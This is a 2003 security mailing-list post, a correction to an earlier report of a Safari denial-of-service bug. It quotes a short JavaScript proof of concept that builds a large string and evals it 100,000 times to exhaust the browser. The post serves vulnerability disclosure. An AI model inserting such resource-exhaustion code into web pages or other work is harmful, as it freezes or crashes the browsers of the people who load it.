[<prev] [next>] [day] [month] [year] [list]
Message-ID: <A7F746377BDB7D4EA8E6623AF92F43C8132C1F@copper.bwsint.com>
Date: Sun, 23 Nov 2003 12:07:46 -0000
From: "Grant Husbands" <grant.husbands@...inesswebsoftware.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: RE: safari dos
I wrote:
> b='';a="b=b+' ';"
> for (var i=0;i<15;++i) a+=a;
> // Above line creates a 64MB script
> // Now run the 64MB script, 100,000 times
> for (var i=0;i<100000;++i) eval(a);
Just a quick note; I had altered the script without updating
the comments. It only creates a 256KB script, now; a longer
one didn't seem necessary. Sorry.
Regards,
Grant.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists